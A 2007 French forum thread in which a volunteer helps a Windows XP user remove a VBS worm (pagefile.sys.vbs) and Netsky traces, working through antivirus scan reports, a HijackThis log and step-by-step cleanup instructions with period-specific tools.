Infecté par: Win32.Worm.Vbs.Solow.B

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145658.vbs=>(unicode)
Echec de la désinfection

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145658.vbs=>(unicode)
Supprimé

















Résultat virusscan
Scanner Malware name
A-Squared X
AntiVir JB
ArcaVir Trojan.Sdbot.Bti
Avast Zombie-2413
AVG Antivirus Darth_Vader
BitDefender Zombie.2413
ClamAV DarthVader
CPsecure X
Dr.Web JB.dropper.2413
F-Prot Antivirus Zombie.2413
F-Secure Anti-Virus Virus.DOS.Zombie.2413
Fortinet Zombie.2413
Kaspersky Anti-Virus Virus.DOS.Zombie.2413
NOD32 probably unknown CRYPT.TSR.COM.EXE
Norman Virus Control X
Panda Antivirus Zombie.2413
Rising Antivirus Trojan.VB.mn
Sophos Antivirus Zombie-2413
VirusBuster Zombie.2413
VBA32 Email-Worm.VBS.Lee-based
0
jlpjlp Messages postés 51580 Date d'inscription vendredi 18 mai 2007 Statut Contributeur sécurité Dernière intervention 3 mai 2022 5 040
9 oct. 2007 à 10:05
slt, ca se sont des virus dans ta messagerie thunderbird alors supprime les messages que tu ne connais pas et dans ta poubelle



C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\Local Folders\Inbox=>(message 31)
Infecté par: Generic.Peed.Eml.09884D34


__________________

ça ce sont des virus dans la restauration systeme: c'est pour cela que ça a persisté meme en faisant une restauration :


désactiver la restauration système (dans DEMARRER puis TOUS LES PROG puis ACCESOIRE puis OUTILS SYSTEME puis DANS RESTAURATION SYSTEME aller dans paramètre et désactiver la restauration)
puis réactive la.




H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145658.vbs=>(unicode)
Echec de la désinfection

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145658.vbs=>(unicode)
Supprimé


_____________________



utilise pour supprimer tes traces

CCLEANER: (lance un nettoyage et répare 3 fois les erreurs) sans installer la barre yahoo

https://www.01net.com/telecharger/windows/Utilitaire/nettoyeurs_et_installeurs/fiches/32599.html

_________________

refait un scan en ligne et colle le rapport


_______________


si ca persiste

colle un rapport hijackthis

http://www.trendsecure.com/portal/en-US/tools/security_tools/hijackthis/download

manuel :

https://leblogdeclaude.blogspot.com/2006/10/informatique-section-hijackthis.html


Je conseille de renomer Hijackthis, pour contrer une éventuelle infection de Vundo.

ex:Renomme le fichier HijackThis.exe en eden.exe pour cela, fais un clic droit sur le fichier HijackThis.exe et choisis renommer dans la liste

Ensuite avec Explorer créer un dossier c:\hijackthis
Décompresser Hijackthis dans ce dossier.
C'est important pour les sauvegardes."
0
joalland Messages postés 39 Date d'inscription jeudi 8 juillet 2004 Statut Membre Dernière intervention 10 octobre 2007
9 oct. 2007 à 12:32
Bonjour
et encore merci pour ton aide.
Voici le rapport bitdifender

C:\pagefile.sys.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
C:\pagefile.sys.vbs=>(unicode) Echec de la désinfection
C:\pagefile.sys.vbs=>(unicode) Supprimé
C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146039.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146039.vbs=>(unicode) Echec de la désinfection
C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146039.vbs=>(unicode) Supprimé
C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146040.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146040.vbs=>(unicode) Echec de la désinfection
C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146040.vbs=>(unicode) Supprimé
C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146056.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146056.vbs=>(unicode) Echec de la désinfection
C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146056.vbs=>(unicode) Supprimé
C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146057.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146057.vbs=>(unicode) Echec de la désinfection
C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146057.vbs=>(unicode) Supprimé
C:\WINDOWS\pagefile.sys.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
C:\WINDOWS\pagefile.sys.vbs=>(unicode) Echec de la désinfection
C:\WINDOWS\pagefile.sys.vbs=>(unicode) Supprimé
D:\pagefile.sys.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
D:\pagefile.sys.vbs=>(unicode) Echec de la désinfection
D:\pagefile.sys.vbs=>(unicode) Supprimé
D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:final.exe Infecté par: Win32.Netsky.C@mm.Damaged
D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:final.exe Echec de la désinfection
D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:final.exe Supprimé
D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64) Echec de la mise à jour
D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:word_doc_number_phone.rtf.pif Infecté par: Win32.Netsky.C@mm.Damaged
D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:word_doc_number_phone.rtf.pif Echec de la désinfection
D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:word_doc_number_phone.rtf.pif Supprimé
D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64) Echec de la mise à jour
D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146042.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146042.vbs=>(unicode) Echec de la désinfection
D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146042.vbs=>(unicode) Supprimé
D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146059.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146059.vbs=>(unicode) Echec de la désinfection
D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146059.vbs=>(unicode) Supprimé
F:\pagefile.sys.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
F:\pagefile.sys.vbs=>(unicode) Echec de la désinfection
F:\pagefile.sys.vbs=>(unicode) Supprimé
F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146044.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146044.vbs=>(unicode) Echec de la désinfection
F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146044.vbs=>(unicode) Supprimé
F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146061.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146061.vbs=>(unicode) Echec de la désinfection
F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146061.vbs=>(unicode) Supprimé
H:\pagefile.sys.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
H:\pagefile.sys.vbs=>(unicode) Echec de la désinfection
H:\pagefile.sys.vbs=>(unicode) Supprimé
H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146046.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146046.vbs=>(unicode) Echec de la désinfection
H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146046.vbs=>(unicode) Supprimé
H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146063.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146063.vbs=>(unicode) Echec de la désinfection
H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146063.vbs=>(unicode) Supprimé
0
joalland Messages postés 39 Date d'inscription jeudi 8 juillet 2004 Statut Membre Dernière intervention 10 octobre 2007
9 oct. 2007 à 12:42
Asuivre le rapport
Hijackthis

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:41:40, on 09/10/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16512)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\ZoneLabs\vsmon.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\bgsmsnd.exe
C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
C:\WINDOWS\System32\WScript.exe
C:\Program Files\RocketDock\RocketDock.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\WIDCOMM\Logiciel Bluetooth\bin\btwdins.exe
C:\Program Files\FolderSize\FolderSizeSvc.exe
C:\WINDOWS\system32\ntvdm.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
C:\hijackthis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.fr/?gws_rd=ssl
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.msn.com/fr-fr/?ocid=iehp
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_10\bin\ssv.dll
O2 - BHO: IEHlprObj Class - {CE7C3CF0-4B15-11D1-ABED-709549C10111} - C:\Program Files\TrueDownloader\truedownloaderie.dll
O2 - BHO: (no name) - {FE063DB1-4EC0-403e-8DD8-394C54984B2C} - (no file)
O2 - BHO: (no name) - {FFFFFEF0-5B30-21D4-945D-000000000000} - C:\PROGRA~1\STARDO~1\SDIEInt.dll
O3 - Toolbar: pdfMachine - {56CF4856-ECB4-4e46-A897-A378821F97B9} - C:\WINDOWS\system32\bgstb.dll
O3 - Toolbar: (no name) - {FE063DB9-4EC0-403e-8DD8-394C54984B2C} - (no file)
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKLM\..\Run: [bgsmsnd.exe] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\bgsmsnd.exe
O4 - HKLM\..\Run: [ZoneAlarm Client] "C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe"
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [MSRegInfo] C:\WINDOWS\pagefile.sys.vbs
O4 - HKCU\..\Run: [RocketDock] "C:\Program Files\RocketDock\RocketDock.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [RamBoostXp] C:\Program Files\RamBoost XP\rambxpfr.exe
O4 - Startup: DateInTray.lnk = C:\Program Files\DateInTray\DateInTray.exe
O4 - Startup: DesktopEarth AutoStart.lnk = ?
O4 - Startup: Moniteur Fax-Voix.lnk = C:\OLIFAXVX\MONITEUR.EXE
O4 - Global Startup: Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe
O8 - Extra context menu item: Télécharger avec Star Downloader - C:\Program Files\Star Downloader\sdie.htm
O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} (RdxIE Class) - http://software-dl.real.com/13f0b4f24030b75c4e06/netzip/RdxIE601_fr.cab
O16 - DPF: {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} (BDSCANONLINE Control) - http://www.coupdepoucepc.com/scan8/oscan8.cab
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall Control) - https://www.trendmicro.com/en_us/forHome/products/housecall.html
O16 - DPF: {BFF1950D-B1B4-4AE8-B842-B2CCF06D9A1B} (Zylom Games Player) - http://game12.zylom.com/activex/zylomgamesplayer.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553563000} - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
O16 - DPF: {EF791A6B-FC12-4C68-99EF-FB9E207A39E6} (McFreeScan Class) - http://download.mcafee.com/molbin/iss-loc/mcfscan/2,1,0,4896/mcfscan.cab
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Logiciel Bluetooth\bin\btwdins.exe
O23 - Service: Folder Size (FolderSize) - Brio - C:\Program Files\FolderSize\FolderSizeSvc.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Fichiers communs\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - CACE Technologies - C:\Program Files\WinPcap\rpcapd.exe
O23 - Service: TrueVector Internet Monitor (vsmon) - Zone Labs, LLC - C:\WINDOWS\system32\ZoneLabs\vsmon.exe
0
jlpjlp Messages postés 51580 Date d'inscription vendredi 18 mai 2007 Statut Contributeur sécurité Dernière intervention 3 mai 2022 5 040
9 oct. 2007 à 14:08
FIX ces lignes avec hijackthis: ferme toutes les applications , ouvrir hijackthis faire do system scan only puis cocher chaque ligne sur la gauche puis cliquer en bas sur fix cheked:

O2 - BHO: IEHlprObj Class - {CE7C3CF0-4B15-11D1-ABED-709549C10111} - C:\Program Files\TrueDownloader\truedownloaderie.dll
O2 - BHO: (no name) - {FE063DB1-4EC0-403e-8DD8-394C54984B2C} - (no file)

O3 - Toolbar: (no name) - {FE063DB9-4EC0-403e-8DD8-394C54984B2C} - (no file)

O4 - HKLM\..\Run: [bgsmsnd.exe] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\bgsmsnd.exe

O4 - HKLM\..\Run: [MSRegInfo] C:\WINDOWS\pagefile.sys.vbs

O4 - HKCU\..\Run: [RocketDock] "C:\Program Files\RocketDock\RocketDock.exe"


O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} (RdxIE Class) - http://software-dl.real.com/13f0b4f24030b75c4e06/netzip/RdxIE601_fr.cab

________________


télécharge OTMoveIt http://download.bleepingcomputer.com/oldtimer/OTMoveIt.exe (de Old_Timer) sur ton Bureau.
double-clique sur OTMoveIt.exe pour le lancer.
copie la liste qui se trouve en citation ci-dessous,
et colle-la dans le cadre de gauche de OTMoveIt :Paste List of Files/Folders to be moved.

Citation :

C:\WINDOWS\pagefile.sys.vbs


clique sur MoveIt! pour lancer la suppression.
le résultat apparaitra dans le cadre "Results".
clique sur Exit pour fermer.
poste le rapport situé dans C:\_OTMoveIt\MovedFiles.

il te sera peut-être demander de redémarrer le pc pour achever la suppression.si c'est le cas accepte par Yes.
http://img137.imageshack.us/img137/3558/refaitjk8.th.jpg


________________

comme j'ai vu que tu avais netsky scan avec ce logiciel:
https://www.broadcom.com/support/security-center

et si tu peux vire le fichier incriminé manuellement dans ta sauvegarde foxmail
________________

AVG antispyxare

https://www.01net.com/telecharger/

Tuto :
http://www.kachouri.com/tuto/tuto-161-avg-anti-spyware-75-pour-votre-securite.html

->Relance AVG AS -> "Analyse" ->"Paramètres"

Sous la question "Comment réagir ?" :

-> clique sur "Actions recommandées" et choisis "Quarantaines"
-> Re-clique sur l'onglet "Analyse" puis réalise une "Analyse complète du système"

Si un fichier est infecté en fin d'analyse

->Clique sur "Appliquer toutes les actions "

->Clique sur "Enregistrer le rapport" puis sur "Enregistrer le rapport sous".

->Enregistre ce fichier texte sur ton bureau ensuite colle le rapport ici

________________


désactiver la restauration système (dans DEMARRER puis TOUS LES PROG puis ACCESOIRE puis OUTILS SYSTEME puis DANS RESTAURATION SYSTEME aller dans paramètre et désactiver la restauration)


________________

refait un scan en ligne pour voir
________________


réactive la restauration systeme.
______________
recolle hijackthis et dis tes pbs
0
joalland Messages postés 39 Date d'inscription jeudi 8 juillet 2004 Statut Membre Dernière intervention 10 octobre 2007
9 oct. 2007 à 14:37
J'en suis au redemarage après Movelt
Mais pas de rapport ou tu dis.
J'avais fait un copier coller de la collone de droite :
File move failed. C:\WINDOWS\pagefile.sys.vbs scheduled to be moved on reboot.

Created on 10/09/2007 14:27:28
Je suis en cour de téléchargement de AVG
A+
0
joalland Messages postés 39 Date d'inscription jeudi 8 juillet 2004 Statut Membre Dernière intervention 10 octobre 2007
9 oct. 2007 à 15:06
Comme le résultat ne ma semblais pas bon
j'ai refait la procédure
de fix cheked
il ne restait que les lignes
O4 - HKLM\..\Run: [MSRegInfo] C:\WINDOWS\pagefile.sys.vbs j'ai coché que celle ci


O4 - HKCU\..\Run: [RocketDock] "C:\Program Files\RocketDock\RocketDock.exe" cela je sais ce que c'est une barre de menu
https://punklabs.com

puis j'ai refait MoveIt
le rapport copier coller sans redemarage demandé.
C:\WINDOWS\pagefile.sys.vbs moved successfully.

Created on 10/09/2007 14:56:31
0
joalland Messages postés 39 Date d'inscription jeudi 8 juillet 2004 Statut Membre Dernière intervention 10 octobre 2007
9 oct. 2007 à 16:18
Rappoert AVG
---------------------------------------------------------
AVG Anti-Spyware - Rapport d'analyse
---------------------------------------------------------

+ Créé à: 16:15:26 09/10/2007

+ Résultat de l'analyse:



Rien à signaler.



Fin du rapport




Mais le les fichiers "pagefile.sys.vbs" son toujours là ?????
Denis
0
jlpjlp Messages postés 51580 Date d'inscription vendredi 18 mai 2007 Statut Contributeur sécurité Dernière intervention 3 mai 2022 5 040
9 oct. 2007 à 16:36
Télécharge ce tool de sUBs:

http://www.techsupportforum.com/sectools/sUBs/Flash_Disinfector.exe

Double-clique dessus et laisse-toi guider.

_________________


Colle le rapport :
Clean permettra de faire du nettoyage et supprimer des fichiers que des anti-virus et anti-spywares n'ont pas pu trouver. Le logiciel est régulièrement mis à jour, vous devrez donc le re-téléchargé pour obtenir une version plus récente.

• Téléchargez clean.zip, décompressez-le sur votre bureau (clic droit / extraire tout), vous obtenez alors un dossier clean
• Démarrez Windows en mode sans échec : Guide pour redémarrer en mode sans échec
• Ouvrez le dossier clean qui se trouve sur ton bureau, et double-cliquez sur clean.cmd, une fenêtre noire va apparaître pendant un instant, laissez la ouverte jusqu'à ce qu'elle se ferme.

http://kerio.probb.fr/tuto-Clean-h37.html


________________


désactiver la restauration système (dans DEMARRER puis TOUS LES PROG puis ACCESOIRE puis OUTILS SYSTEME puis DANS RESTAURATION SYSTEME aller dans paramètre et désactiver la restauration)


________________

refait un scan en ligne pour voir
________________


réactive la restauration systeme.
______________
recolle hijackthis et dis tes pbs
0
joalland Messages postés 39 Date d'inscription jeudi 8 juillet 2004 Statut Membre Dernière intervention 10 octobre 2007
9 oct. 2007 à 17:17
Merci pour ton aide.
mais cela commence à devenir trop compliqué pour moi.
Surtout que je ne sais pas si c'est un virus ?
Mon ordi marche bien.
Il y à juste ces fichiers qui sont apparue et le même mais appelé "MSRegInfo" qui ce lance avec Windows sans que je puisse l'en enpécher.
Comme personne d'autre ne parle de ce problème sur Google, je croid que je vais en resté là pour le moment.
Sauf si tu me dis qu'il faut impérativment poursuivre.
A+
Denis
Encore merci.
0
jlpjlp Messages postés 51580 Date d'inscription vendredi 18 mai 2007 Statut Contributeur sécurité Dernière intervention 3 mai 2022 5 040
9 oct. 2007 à 19:58
pagefile.sys.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B

c'est un virus donc si j'etais toi je continurai..


a plus
0
joalland Messages postés 39 Date d'inscription jeudi 8 juillet 2004 Statut Membre Dernière intervention 10 octobre 2007
9 oct. 2007 à 22:26
Ok
j'ai essaué Flash_Disinfector.exe mais très vite un message d'erreur titre "Windows pas de disque" contenu prtiel du message "Eception procesing message"
annuler continuer reessayer
rien ne marche. obliger de cliquer plein de fois sur annuler pour que la fenetre se ferme.

Clean.cmd
rapport
09/10/2007 a 22:11:40,85

*** Recherche des fichiers dans C:
C:\autorun.inf FOUND

*** Recherche des fichiers dans C:\WINDOWS\

*** Recherche des fichiers dans C:\WINDOWS\system32
"C:\WINDOWS\Downloaded Program Files\CONFLICT.1" FOUND

*** Recherche des fichiers dans C:\Program Files
*** Fin du rapport !

Je m'arret là pour ce soir

je suis sur le pont de puis 3h30 ce matin.
dodo.
Mais je pense apporter mon ordi à la clinique micro.
sauf si pour toi on peut trouver une solution rappide.
Un grand merci, tes explication était simple à suivre pour un amateur.
Bonne nuit
Denis
0